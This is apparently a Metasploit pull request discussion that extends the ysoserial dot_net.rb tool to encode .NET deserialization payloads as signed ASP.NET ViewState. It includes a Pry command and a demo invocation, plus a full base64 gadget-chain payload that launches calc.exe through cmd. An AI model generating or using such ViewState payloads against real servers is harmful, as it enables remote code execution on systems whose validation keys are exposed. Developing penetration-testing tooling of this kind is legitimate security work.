Feat/tool/ysoserial/viewstate

[zeroSteiner]

This updates the existing tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate. There are currently three viewstate related options, of which only --viewstate-validation-key is required. The other options have reasonable defaults. To keep this code DRY, much of it was moved out of the mixin and into a Rex library that the CLI tool can access. Unit tests were added for this code.

There only appears to be a small handful of modules using the ViewState mixin. The easiest way I found to test it was to use the exploit/windows/http/plesk_mylittleadmin_viewstate module and invoke the method using Pry and the module's own default values.

By comparing the MD5 hash before and after the changes, and seeing that they are the same, we can determine that the functionality was maintained after the code was refactored into the Rex library.

[1] pry(#<Msf::Modules::Exploit__Windows__Http__Plesk_mylittleadmin_viewstate::MetasploitModule>)> OpenSSL::Digest::MD5.hexdigest(generate_viewstate_payload('calc.exe', key: VIEWSTATE_VALIDATION_KEY, extra: [VIEWSTATE_GENERATOR.to_i(16)].pack('V')))
=> "2cf2aeae80ca97ea6fe5499730feadad"

Testing

• See that the unit tests pass
• Load up an unmodified version of msfconsole (one without these changes) and use the plesk_mylittleadmin_viewstate module and take note of the MD5 hash using the Pry command from above
• Load up msfconsole with these changes and repeat the process, see that the MD5 hash is the same showing the resulting blobs are identical
• Use the new tools/payloads/ysoserial/dot_net.rb options to encode viewstates
  • Make sure that the help output makes sense
  • Try out all three options
  • See that invalid values are caught and reported in a way that makes sense

Demo

./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
    --viewstate-validation-key deadbeef --viewstate-generator deadbeef --viewstate-validation-algorithm HMACSHA256
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Gadget chain: TextFormattingRunProperties
Formatter:    LosFormatter
Size:         1016
/wEy1AUAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD2AzxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6WD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIHhtbG5zOlM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiB4bWxuczpEPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1zeXN0ZW0iPjxPYmplY3REYXRhUHJvdmlkZXIgWDpLZXk9IiIgT2JqZWN0VHlwZT0ie1g6VHlwZSBEOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCI+PE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPjxTOlN0cmluZz5jbWQ8L1M6U3RyaW5nPjxTOlN0cmluZz4vYyBjYWxjLmV4ZTwvUzpTdHJpbmc+PC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz48L09iamVjdERhdGFQcm92aWRlcj48L1Jlc291cmNlRGljdGlvbmFyeT4L+DRPQ761U2uRllbktXLn0v/WI9aNMDrpO+CDt30o6fQ=

Closes #18894

[mubix]

I can't really anonymize things enough to post, just want to say that this script worked amazingly for me recently. Thanks @zeroSteiner

[adfoster-r7]

Release Notes

Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate